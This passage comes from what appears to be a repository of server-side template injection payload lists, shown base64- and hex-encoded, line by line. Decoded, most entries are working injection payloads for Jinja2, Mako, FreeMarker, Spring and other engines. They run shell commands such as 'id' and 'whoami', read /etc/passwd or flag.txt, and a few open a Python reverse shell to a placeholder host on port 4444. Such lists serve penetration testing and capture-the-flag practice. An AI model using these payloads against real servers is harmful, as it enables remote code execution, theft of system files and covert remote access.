JHtzZWxmLm1vZHVsZS5ydW50aW1lLmV4Y2VwdGlvbnMudHJhY2ViYWNrLmxpbmVjYWNoZS5vcy5zeXN0ZW0oImlkIil9 44 | JHtzZWxmLm1vZHVsZS5ydW50aW1lLmV4Y2VwdGlvbnMudXRpbC5jb21wYXQuaW5zcGVjdC5vcy5zeXN0ZW0oImlkIil9 45 | JHtzZWxmLm1vZHVsZS5ydW50aW1lLmV4Y2VwdGlvbnMudXRpbC5vcy5zeXN0ZW0oImlkIil9 46 | JHtzZWxmLm1vZHVsZS5ydW50aW1lLnV0aWwuY29tcGF0Lmluc3BlY3QubGluZWNhY2hlLm9zLnN5c3RlbSgiaWQiKX0= 47 | JHtzZWxmLm1vZHVsZS5ydW50aW1lLnV0aWwuY29tcGF0Lmluc3BlY3Qub3Muc3lzdGVtKCJpZCIpfQ== 48 | JHtzZWxmLm1vZHVsZS5ydW50aW1lLnV0aWwub3Muc3lzdGVtKCJpZCIpfQ== 49 | JHtzZWxmLnRlbXBsYXRlLl9faW5pdF9fLl9fZ2xvYmFsc19fWydvcyddLnN5c3RlbSgnaWQnKX0= 50 | JHtzZWxmLnRlbXBsYXRlLl9tbWFya2VyLm1vZHVsZS5jYWNoZS5jb21wYXQuaW5zcGVjdC5vcy5zeXN0ZW0oImlkIil9 51 | JHtzZWxmLnRlbXBsYXRlLl9tbWFya2VyLm1vZHVsZS5jYWNoZS51dGlsLm9zLnN5c3RlbSgiaWQiKX0= 52 | JHtzZWxmLnRlbXBsYXRlLl9tbWFya2VyLm1vZHVsZS5maWx0ZXJzLmNvbXBhdC5pbnNwZWN0Lm9zLnN5c3RlbSgiaWQiKX0= 53 | JHtzZWxmLnRlbXBsYXRlLl9tbWFya2VyLm1vZHVsZS5ydW50aW1lLmNvbXBhdC5pbnNwZWN0Lm9zLnN5c3RlbSgiaWQiKX0= 54 | JHtzZWxmLnRlbXBsYXRlLl9tbWFya2VyLm1vZHVsZS5ydW50aW1lLmV4Y2VwdGlvbnMudXRpbC5vcy5zeXN0ZW0oImlkIil9 55 | JHtzZWxmLnRlbXBsYXRlLl9tbWFya2VyLm1vZHVsZS5ydW50aW1lLnV0aWwub3Muc3lzdGVtKCJpZCIpfQ== 56 | JHtzZWxmLnRlbXBsYXRlLm1vZHVsZS5jYWNoZS5jb21wYXQuaW5zcGVjdC5saW5lY2FjaGUub3Muc3lzdGVtKCJpZCIpfQ== 57 | JHtzZWxmLnRlbXBsYXRlLm1vZHVsZS5jYWNoZS5jb21wYXQuaW5zcGVjdC5vcy5zeXN0ZW0oImlkIil9 58 | JHtzZWxmLnRlbXBsYXRlLm1vZHVsZS5jYWNoZS51dGlsLmNvbXBhdC5pbnNwZWN0Lm9zLnN5c3RlbSgiaWQiKX0= 59 | JHtzZWxmLnRlbXBsYXRlLm1vZHVsZS5jYWNoZS51dGlsLm9zLnN5c3RlbSgiaWQiKX0= 60 | JHtzZWxmLnRlbXBsYXRlLm1vZHVsZS5maWx0ZXJzLmNvbXBhdC5pbnNwZWN0LmxpbmVjYWNoZS5vcy5zeXN0ZW0oImlkIil9 61 | JHtzZWxmLnRlbXBsYXRlLm1vZHVsZS5maWx0ZXJzLmNvbXBhdC5pbnNwZWN0Lm9zLnN5c3RlbSgiaWQiKX0= 62 | JHtzZWxmLnRlbXBsYXRlLm1vZHVsZS5ydW50aW1lLmNvbXBhdC5pbnNwZWN0LmxpbmVjYWNoZS5vcy5zeXN0ZW0oImlkIil9 63 | JHtzZWxmLnRlbXBsYXRlLm1vZHVsZS5ydW50aW1lLmNvbXBhdC5pbnNwZWN0Lm9zLnN5c3RlbSgiaWQiKX0= 64 | JHtzZWxmLnRlbXBsYXRlLm1vZHVsZS5ydW50aW1lLmV4Y2VwdGlvbnMuY29tcGF0Lmluc3BlY3Qub3Muc3lzdGVtKCJpZCIpfQ== 65 | JHtzZWxmLnRlbXBsYXRlLm1vZHVsZS5ydW50aW1lLmV4Y2VwdGlvbnMudHJhY2ViYWNrLmxpbmVjYWNoZS5vcy5zeXN0ZW0oImlkIil9 66 | JHtzZWxmLnRlbXBsYXRlLm1vZHVsZS5ydW50aW1lLmV4Y2VwdGlvbnMudXRpbC5vcy5zeXN0ZW0oImlkIil9 67 | JHtzZWxmLnRlbXBsYXRlLm1vZHVsZS5ydW50aW1lLnV0aWwuY29tcGF0Lmluc3BlY3Qub3Muc3lzdGVtKCJpZCIpfQ== 68 | JHtzZWxmLnRlbXBsYXRlLm1vZHVsZS5ydW50aW1lLnV0aWwub3Muc3lzdGVtKCJpZCIpfQ== 69 | JHt7MyozfX0= 70 | JHt7Nyo3fX0= 71 | JHt7PCVbJScifX0lXA== 72 | Kns3Kjd9 73 | KntUKG9yZy5hcGFjaGUuY29tbW9ucy5pby5JT1V0aWxzKS50b1N0cmluZyhUKGphdmEubGFuZy5SdW50aW1lKS5nZXRSdW50aW1lKCkuZXhlYygnaWQnKS5nZXRJbnB1dFN0cmVhbSgpKX0= 74 | NDIqNDI= 75 | PCNhc3NpZ24gZXggPSAiZnJlZW1hcmtlci50ZW1wbGF0ZS51dGlsaXR5LkV4ZWN1dGUiP25ldygpPiR7IGV4KCJpZCIpfQ== 76 | PCU9IDMgKiAzICU+ 77 | PCU9IDcgKiA3ICU+ 78 | PCU9IDcqNyAlPg== 79 | PCU9IEZpbGUub3BlbignL2V0Yy9wYXNzd2QnKS5yZWFkICU+ 80 | PCU9NDIqNDIgJT4= 81 | QCgxKzIp 82 | QCg2KzUp 83 | WyNhc3NpZ24gZXggPSAnZnJlZW1hcmtlci50ZW1wbGF0ZS51dGlsaXR5LkV4ZWN1dGUnP25ldygpXSR7IGV4KCdpZCcpfQ== 84 | WzcqN10= 85 | W1skezQyKjQyfV1d 86 | eyRzbWFydHkudmVyc2lvbn0= 87 | eyUgZm9yIGtleSwgdmFsdWUgaW4gY29uZmlnLml0ZXJpdGVtcygpICV9PGR0Pnt7IGtleXxlIH19PC9kdD48ZGQ+e3sgdmFsdWV8ZSB9fTwvZGQ+eyUgZW5kZm9yICV9 88 | eyUgZm9yIHggaW4gKCkuX19jbGFzc19fLl9fYmFzZV9fLl9fc3ViY2xhc3Nlc19fKCkgJX17JSBpZiAid2FybmluZyIgaW4geC5fX25hbWVfXyAlfXt7eCgpLl9tb2R1bGUuX19idWlsdGluc19fWydfX2ltcG9ydF9fJ10oJ29zJykucG9wZW4oInB5dGhvbjMgLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiaXBcIiw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbXCIvYmluL2NhdFwiLCBcIi9ldGMvcGFzc3dkXCJdKTsnIikucmVhZCgpLnpmaWxsKDQxNyl9fXslZW5kaWYlfXslIGVuZGZvciAlfQ== 89 | eyUgZm9yIHggaW4gKCkuX19jbGFzc19fLl9fYmFzZV9fLl9fc3ViY2xhc3Nlc19fKCkgJX17JSBpZiAid2FybmluZyIgaW4geC5fX25hbWVfXyAlfXt7eCgpLl9tb2R1bGUuX19idWlsdGluc19fWydfX2ltcG9ydF9fJ10oJ29zJykucG9wZW4oInB5dGhvbjMgLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiaXBcIiw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbXCIvYmluL2NhdFwiLCBcImZsYWcudHh0XCJdKTsnIikucmVhZCgpLnpmaWxsKDQxNyl9fXslZW5kaWYlfXslIGVuZGZvciAlfQ== 90 | eyUgZm9yIHggaW4gKCkuX19jbGFzc19fLl9fYmFzZV9fLl9fc3ViY2xhc3Nlc19fKCkgJX17JSBpZiAid2FybmluZyIgaW4geC5fX25hbWVfXyAlfXt7eCgpLl9tb2R1bGUuX19idWlsdGluc19fWydfX2ltcG9ydF9fJ10oJ29zJykucG9wZW4ocmVxdWVzdC5hcmdzLmlucHV0KS5yZWFkKCl9fXslZW5kaWYlfXslZW5kZm9yJX0= 91 | ezQyKjQyfQ== 92 | e154eXptNDJ9MTc2NHsveHl6bTQyfQ== 93 | e3BocH1lY2hvIGBpZGA7ey9waHB9 94 | e3sgJycuX19jbGFzc19fLl9fbXJvX19bMl0uX19zdWJjbGFzc2VzX18oKSB9fQ== 95 | e3sgJycuX19jbGFzc19fLl9fbXJvX19bMl0uX19zdWJjbGFzc2VzX18oKVs0MF0oJy9ldGMvcGFzc3dkJykucmVhZCgpIH19 96 | e3sgW10uY2xhc3MuYmFzZS5zdWJjbGFzc2VzKCkgfX0= 97 | e3sgY29uZmlnLml0ZW1zKClbNF1bMV0uX19jbGFzc19fLl9fbXJvX19bMl0uX19zdWJjbGFzc2VzX18oKVs0MF0oIi9ldGMvcGFzc3dkIikucmVhZCgpIH19 98 | e3sgcmVxdWVzdCB9fQ== 99 | e3snJy5fX2NsYXNzX18uX19iYXNlX18uX19zdWJjbGFzc2VzX18oKVsyMjddKCdjYXQgL2V0Yy9wYXNzd2QnLCBzaGVsbD1UcnVlLCBzdGRvdXQ9LTEpLmNvbW11bmljYXRlKCl9fQ== 100 | e3snJy5fX2NsYXNzX18ubXJvKClbMV0uX19zdWJjbGFzc2VzX18oKVszOTZdKCdjYXQgL2V0Yy9wYXNzd2QnLHNoZWxsPVRydWUsc3Rkb3V0PS0xKS5jb21tdW5pY2F0ZSgpWzBdLnN0cmlwKCl9fQ== 101 | e3snJy5fX2NsYXNzX18ubXJvKClbMV0uX19zdWJjbGFzc2VzX18oKVszOTZdKCdjYXQgZmxhZy50eHQnLHNoZWxsPVRydWUsc3Rkb3V0PS0xKS5jb21tdW5pY2F0ZSgpWzBdLnN0cmlwKCl9fQ== 102 | e3snJy5jbGFzcy5tcm8oKVsxXS5zdWJjbGFzc2VzKCl9fQ== 103 | e3snYScuZ2V0Q2xhc3MoKS5mb3JOYW1lKCdqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcicpLm5ld0luc3RhbmNlKCkuZ2V0RW5naW5lQnlOYW1lKCdKYXZhU2NyaXB0JykuZXZhbChcIm5ldyBqYXZhLmxhbmcuU3RyaW5nKCd4eHgnKVwiKX19 104 | e3snYScuZ2V0Q2xhc3MoKS5mb3JOYW1lKCdqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcicpLm5ld0luc3RhbmNlKCkuZ2V0RW5naW5lQnlOYW1lKCdKYXZhU2NyaXB0JykuZXZhbChcInZhciB4PW5ldyBqYXZhLmxhbmcuUHJvY2Vzc0J1aWxkZXI7IHguY29tbWFuZChcXFwibmV0c3RhdFxcXCIpOyBvcmcuYXBhY2hlLmNvbW1vbnMuaW8uSU9VdGlscy50b1N0cmluZyh4LnN0YXJ0KCkuZ2V0SW5wdXRTdHJlYW0oKSlcIil9fQ== 105 | e3snYScuZ2V0Q2xhc3MoKS5mb3JOYW1lKCdqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcicpLm5ld0luc3RhbmNlKCkuZ2V0RW5naW5lQnlOYW1lKCdKYXZhU2NyaXB0JykuZXZhbChcInZhciB4PW5ldyBqYXZhLmxhbmcuUHJvY2Vzc0J1aWxkZXI7IHguY29tbWFuZChcXFwidW5hbWVcXFwiLFxcXCItYVxcXCIpOyBvcmcuYXBhY2hlLmNvbW1vbnMuaW8uSU9VdGlscy50b1N0cmluZyh4LnN0YXJ0KCkuZ2V0SW5wdXRTdHJlYW0oKSlcIil9fQ== 106 | e3snYScuZ2V0Q2xhc3MoKS5mb3JOYW1lKCdqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlcicpLm5ld0luc3RhbmNlKCkuZ2V0RW5naW5lQnlOYW1lKCdKYXZhU2NyaXB0JykuZXZhbChcInZhciB4PW5ldyBqYXZhLmxhbmcuUHJvY2Vzc0J1aWxkZXI7IHguY29tbWFuZChcXFwid2hvYW1pXFxcIik7IHguc3RhcnQoKVwiKX19 107 | e3snYScudG9VcHBlckNhc2UoKX19 108 | e3syKjJ9fVtbMyozXV0= 109 | e3szKiczJ319 110 | e3szKjN9fQ== 111 | e3s0KjR9fVtbNSo1XV0= 112 | e3s0Mio0Mn19 113 | e3s3Kic3J319 114 | e3s3Kjd9fQ== 115 | e3s3Kjd9fSR7Nyo3fTwlPSA3KjcgJT4ke3s3Kjd9fSN7Nyo3fSR7ezwlWyUnIn19JVw= 116 | e3s9NDIqNDJ9fQ== 117 | e3tbJ2NhdCRJRlMvZXRjL3Bhc3N3ZCddfGZpbHRlcignc3lzdGVtJyl9fQ== 118 | e3tbJ2NhdFx4MjAvZXRjL3Bhc3N3ZCddfGZpbHRlcignc3lzdGVtJyl9fQ== 119 | e3tbJ2lkJ118ZmlsdGVyKCdzeXN0ZW0nKX19 120 | e3thcHAucmVxdWVzdC5xdWVyeS5maWx0ZXIoMCwwLDEwMjQseydvcHRpb25zJzonc3lzdGVtJ30pfX0= 121 | e3thcHAucmVxdWVzdC5zZXJ2ZXIuYWxsfGpvaW4oJywnKX19 122 | e3tjb25maWcuX19jbGFzc19fLl9faW5pdF9fLl9fZ2xvYmFsc19fWydvcyddLnBvcGVuKCdscycpLnJlYWQoKX19 123 | e3tjb25maWcuaXRlbXMoKX19 124 | e3tjeWNsZXIuX19pbml0X18uX19nbG9iYWxzX18ub3N9fQ== 125 | e3tkdW1wKGFwcCl9fQ== 126 | e3tqb2luZXIuX19pbml0X18uX19nbG9iYWxzX18ub3N9fQ== 127 | e3tuYW1lc3BhY2UuX19pbml0X18uX19nbG9iYWxzX18ub3N9fQ== 128 | e3tyZXF1ZXN0Ll9fY2xhc3NfX319 129 | e3tyZXF1ZXN0fGF0dHIoIl9fY2xhc3NfXyIpfX0= 130 | e3tyZXF1ZXN0fGF0dHIoJ2FwcGxpY2F0aW9uJyl8YXR0cignXHg1Zlx4NWZnbG9iYWxzXHg1Zlx4NWYnKXxhdHRyKCdceDVmXHg1ZmdldGl0ZW1ceDVmXHg1ZicpKCdceDVmXHg1ZmJ1aWx0aW5zXHg1Zlx4NWYnKXxhdHRyKCdceDVmXHg1ZmdldGl0ZW1ceDVmXHg1ZicpKCdceDVmXHg1ZmltcG9ydFx4NWZceDVmJykoJ29zJyl8YXR0cigncG9wZW4nKSgnaWQnKXxhdHRyKCdyZWFkJykoKX19 131 | e3tyZXF1ZXN0fGF0dHIoWyJfIioyLCJjbGFzcyIsIl8iKjJdfGpvaW4pfX0= 132 | e3tyZXF1ZXN0fGF0dHIoWyJfXyIsImNsYXNzIiwiX18iXXxqb2luKX19 133 | e3tyZXF1ZXN0fGF0dHIoW3JlcXVlc3QuYXJncy51c2MqMixyZXF1ZXN0LmFyZ3MuY2xhc3MscmVxdWVzdC5hcmdzLnVzYyoyXXxqb2luKX19 134 | e3tzZWxmLl9UZW1wbGF0ZVJlZmVyZW5jZV9fY29udGV4dC5jeWNsZXIuX19pbml0X18uX19nbG9iYWxzX18ub3N9fQ== 135 | e3tzZWxmLl9UZW1wbGF0ZVJlZmVyZW5jZV9fY29udGV4dC5qb2luZXIuX19pbml0X18uX19nbG9iYWxzX18ub3N9fQ== 136 | e3tzZWxmLl9UZW1wbGF0ZVJlZmVyZW5jZV9fY29udGV4dC5uYW1lc3BhY2UuX19pbml0X18uX19nbG9iYWxzX18ub3N9fQ== 137 | e3tzZWxmfX0= 138 | e3t7NDIqNDJ9fX0= 139 | -------------------------------------------------------------------------------- /SSTI/hex_encoded.txt: -------------------------------------------------------------------------------- 1 | 237b2033202a2033207d0a 2 | 237b2037202a2037207d0a 3 | 237b332a337d0a 4 | 237b34322a34327d0a 5 | 237b372a377d0a 6 | 247b22667265656d61726b65722e74656d706c6174652e7574696c6974792e45786563757465223f6e657728292822696422297d0a 7 | 247b332a337d0a 8 | 247b34322a34327d0a 9 | 247b362a367d0a 10 | 247b372a377d0a 11 | 247b54286a6176612e6c616e672e52756e74696d65292e67657452756e74696d6528292e657865632827636174206574632f70617373776427297d0a 12 | 247b54286a6176612e6c616e672e53797374656d292e676574656e7628297d0a 13 | 247b54286f72672e6170616368652e636f6d6d6f6e732e696f2e494f5574696c73292e746f537472696e672854286a6176612e6c616e672e52756e74696d65292e67657452756e74696d6528292e657865632854286a6176612e6c616e672e436861726163746572292e746f537472696e67283939292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e6728393729292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e672831313629292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e6728333229292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e6728343729292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e672831303129292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e672831313629292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e6728393929292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e6728343729292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e672831313229292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e6728393729292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e672831313529292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e672831313529292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e672831313929292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e67283130302929292e676574496e70757453747265616d2829297d0a 14 | 247b54286f72672e6170616368652e636f6d6d6f6e732e696f2e494f5574696c73292e746f537472696e672854286a6176612e6c616e672e52756e74696d65292e67657452756e74696d6528292e657865632854286a6176612e6c616e672e436861726163746572292e746f537472696e67283939292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e6728393729292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e672831313629292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e6728333229292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e6728343729292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e672831303129292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e672831313629292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e6728393929292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e6728343729292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e672831313229292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e6728393729292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e672831313529292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e672831313529292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e672831313929292e636f6e6361742854286a6176612e6c616e672e436861726163746572292e746f537472696e67283130302929292e676574496e70757453747265616d2829297d247b73656c662e6d6f64756c652e63616368652e7574696c2e6f732e73797374656d2822696422297d0a 15 | 247b646f6e6f746578697374737c34322a34327d0a 16 | 247b73656c662e5f5f696e69745f5f2e5f5f676c6f62616c735f5f5b277574696c275d2e6f732e73797374656d2827696427297d0a 17 | 247b73656c662e617474722e5f4e53417474725f5f706172656e742e6d6f64756c652e63616368652e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 18 | 247b73656c662e617474722e5f4e53417474725f5f706172656e742e6d6f64756c652e63616368652e7574696c2e6f732e73797374656d2822696422297d0a 19 | 247b73656c662e617474722e5f4e53417474725f5f706172656e742e6d6f64756c652e66696c746572732e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 20 | 247b73656c662e617474722e5f4e53417474725f5f706172656e742e6d6f64756c652e72756e74696d652e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 21 | 247b73656c662e617474722e5f4e53417474725f5f706172656e742e6d6f64756c652e72756e74696d652e657863657074696f6e732e7574696c2e6f732e73797374656d2822696422297d0a 22 | 247b73656c662e617474722e5f4e53417474725f5f706172656e742e6d6f64756c652e72756e74696d652e7574696c2e6f732e73797374656d2822696422297d0a 23 | 247b73656c662e617474722e5f4e53417474725f5f706172656e742e74656d706c6174652e6d6f64756c652e63616368652e7574696c2e6f732e73797374656d2822696422297d0a 24 | 247b73656c662e617474722e5f4e53417474725f5f706172656e742e74656d706c6174652e6d6f64756c652e72756e74696d652e7574696c2e6f732e73797374656d2822696422297d0a 25 | 247b73656c662e636f6e746578742e5f776974685f74656d706c6174652e5f6d6d61726b65722e6d6f64756c652e63616368652e7574696c2e6f732e73797374656d2822696422297d0a 26 | 247b73656c662e636f6e746578742e5f776974685f74656d706c6174652e5f6d6d61726b65722e6d6f64756c652e72756e74696d652e7574696c2e6f732e73797374656d2822696422297d0a 27 | 247b73656c662e636f6e746578742e5f776974685f74656d706c6174652e6d6f64756c652e63616368652e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 28 | 247b73656c662e636f6e746578742e5f776974685f74656d706c6174652e6d6f64756c652e63616368652e7574696c2e6f732e73797374656d2822696422297d0a 29 | 247b73656c662e636f6e746578742e5f776974685f74656d706c6174652e6d6f64756c652e66696c746572732e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 30 | 247b73656c662e636f6e746578742e5f776974685f74656d706c6174652e6d6f64756c652e72756e74696d652e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 31 | 247b73656c662e636f6e746578742e5f776974685f74656d706c6174652e6d6f64756c652e72756e74696d652e657863657074696f6e732e7574696c2e6f732e73797374656d2822696422297d0a 32 | 247b73656c662e636f6e746578742e5f776974685f74656d706c6174652e6d6f64756c652e72756e74696d652e7574696c2e6f732e73797374656d2822696422297d0a 33 | 247b73656c662e6d6f64756c652e63616368652e636f6d7061742e696e73706563742e6c696e6563616368652e6f732e73797374656d2822696422297d0a 34 | 247b73656c662e6d6f64756c652e63616368652e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 35 | 247b73656c662e6d6f64756c652e63616368652e7574696c2e636f6d7061742e696e73706563742e6c696e6563616368652e6f732e73797374656d2822696422297d0a 36 | 247b73656c662e6d6f64756c652e63616368652e7574696c2e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 37 | 247b73656c662e6d6f64756c652e66696c746572732e636f6d7061742e696e73706563742e6c696e6563616368652e6f732e73797374656d2822696422297d0a 38 | 247b73656c662e6d6f64756c652e66696c746572732e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 39 | 247b73656c662e6d6f64756c652e72756e74696d652e636f6d7061742e696e73706563742e6c696e6563616368652e6f732e73797374656d2822696422297d0a 40 | 247b73656c662e6d6f64756c652e72756e74696d652e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 41 | 247b73656c662e6d6f64756c652e72756e74696d652e657863657074696f6e732e636f6d7061742e696e73706563742e6c696e6563616368652e6f732e73797374656d2822696422297d0a 42 | 247b73656c662e6d6f64756c652e72756e74696d652e657863657074696f6e732e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 43 | 247b73656c662e6d6f64756c652e72756e74696d652e657863657074696f6e732e74726163656261636b2e6c696e6563616368652e6f732e73797374656d2822696422297d0a 44 | 247b73656c662e6d6f64756c652e72756e74696d652e657863657074696f6e732e7574696c2e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 45 | 247b73656c662e6d6f64756c652e72756e74696d652e657863657074696f6e732e7574696c2e6f732e73797374656d2822696422297d0a 46 | 247b73656c662e6d6f64756c652e72756e74696d652e7574696c2e636f6d7061742e696e73706563742e6c696e6563616368652e6f732e73797374656d2822696422297d0a 47 | 247b73656c662e6d6f64756c652e72756e74696d652e7574696c2e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 48 | 247b73656c662e6d6f64756c652e72756e74696d652e7574696c2e6f732e73797374656d2822696422297d0a 49 | 247b73656c662e74656d706c6174652e5f5f696e69745f5f2e5f5f676c6f62616c735f5f5b276f73275d2e73797374656d2827696427297d0a 50 | 247b73656c662e74656d706c6174652e5f6d6d61726b65722e6d6f64756c652e63616368652e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 51 | 247b73656c662e74656d706c6174652e5f6d6d61726b65722e6d6f64756c652e63616368652e7574696c2e6f732e73797374656d2822696422297d0a 52 | 247b73656c662e74656d706c6174652e5f6d6d61726b65722e6d6f64756c652e66696c746572732e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 53 | 247b73656c662e74656d706c6174652e5f6d6d61726b65722e6d6f64756c652e72756e74696d652e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 54 | 247b73656c662e74656d706c6174652e5f6d6d61726b65722e6d6f64756c652e72756e74696d652e657863657074696f6e732e7574696c2e6f732e73797374656d2822696422297d0a 55 | 247b73656c662e74656d706c6174652e5f6d6d61726b65722e6d6f64756c652e72756e74696d652e7574696c2e6f732e73797374656d2822696422297d0a 56 | 247b73656c662e74656d706c6174652e6d6f64756c652e63616368652e636f6d7061742e696e73706563742e6c696e6563616368652e6f732e73797374656d2822696422297d0a 57 | 247b73656c662e74656d706c6174652e6d6f64756c652e63616368652e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 58 | 247b73656c662e74656d706c6174652e6d6f64756c652e63616368652e7574696c2e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 59 | 247b73656c662e74656d706c6174652e6d6f64756c652e63616368652e7574696c2e6f732e73797374656d2822696422297d0a 60 | 247b73656c662e74656d706c6174652e6d6f64756c652e66696c746572732e636f6d7061742e696e73706563742e6c696e6563616368652e6f732e73797374656d2822696422297d0a 61 | 247b73656c662e74656d706c6174652e6d6f64756c652e66696c746572732e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 62 | 247b73656c662e74656d706c6174652e6d6f64756c652e72756e74696d652e636f6d7061742e696e73706563742e6c696e6563616368652e6f732e73797374656d2822696422297d0a 63 | 247b73656c662e74656d706c6174652e6d6f64756c652e72756e74696d652e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 64 | 247b73656c662e74656d706c6174652e6d6f64756c652e72756e74696d652e657863657074696f6e732e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 65 | 247b73656c662e74656d706c6174652e6d6f64756c652e72756e74696d652e657863657074696f6e732e74726163656261636b2e6c696e6563616368652e6f732e73797374656d2822696422297d0a 66 | 247b73656c662e74656d706c6174652e6d6f64756c652e72756e74696d652e657863657074696f6e732e7574696c2e6f732e73797374656d2822696422297d0a 67 | 247b73656c662e74656d706c6174652e6d6f64756c652e72756e74696d652e7574696c2e636f6d7061742e696e73706563742e6f732e73797374656d2822696422297d0a 68 | 247b73656c662e74656d706c6174652e6d6f64756c652e72756e74696d652e7574696c2e6f732e73797374656d2822696422297d0a 69 | 247b7b332a337d7d0a 70 | 247b7b372a377d7d0a 71 | 247b7b3c255b2527227d7d255c0a 72 | 2a7b372a377d0a 73 | 2a7b54286f72672e6170616368652e636f6d6d6f6e732e696f2e494f5574696c73292e746f537472696e672854286a6176612e6c616e672e52756e74696d65292e67657452756e74696d6528292e657865632827696427292e676574496e70757453747265616d2829297d0a 74 | 34322a34320a 75 | 3c2361737369676e206578203d2022667265656d61726b65722e74656d706c6174652e7574696c6974792e45786563757465223f6e657728293e247b2065782822696422297d0a 76 | 3c253d2033202a203320253e0a 77 | 3c253d2037202a203720253e0a 78 | 3c253d20372a3720253e0a 79 | 3c253d2046696c652e6f70656e28272f6574632f70617373776427292e7265616420253e0a 80 | 3c253d34322a343220253e0a 81 | 4028312b32290a 82 | 4028362b35290a 83 | 5b2361737369676e206578203d2027667265656d61726b65722e74656d706c6174652e7574696c6974792e45786563757465273f6e657728295d247b2065782827696427297d0a 84 | 5b372a375d0a 85 | 5b5b247b34322a34327d5d5d0a 86 | 7b24736d617274792e76657273696f6e7d0a 87 | 7b2520666f72206b65792c2076616c756520696e20636f6e6669672e697465726974656d73282920257d3c64743e7b7b206b65797c65207d7d3c2f64743e3c64643e7b7b2076616c75657c65207d7d3c2f64643e7b2520656e64666f7220257d0a 88 | 7b2520666f72207820696e2028292e5f5f636c6173735f5f2e5f5f626173655f5f2e5f5f737562636c61737365735f5f282920257d7b2520696620227761726e696e672220696e20782e5f5f6e616d655f5f20257d7b7b7828292e5f6d6f64756c652e5f5f6275696c74696e735f5f5b275f5f696d706f72745f5f275d28276f7327292e706f70656e2822707974686f6e33202d632027696d706f727420736f636b65742c73756270726f636573732c6f733b733d736f636b65742e736f636b657428736f636b65742e41465f494e45542c736f636b65742e534f434b5f53545245414d293b732e636f6e6e65637428285c2269705c222c3434343429293b6f732e6475703228732e66696c656e6f28292c30293b206f732e6475703228732e66696c656e6f28292c31293b206f732e6475703228732e66696c656e6f28292c32293b703d73756270726f636573732e63616c6c285b5c222f62696e2f6361745c222c205c222f6574632f7061737377645c225d293b2722292e7265616428292e7a66696c6c28343137297d7d7b25656e646966257d7b2520656e64666f7220257d0a 89 | 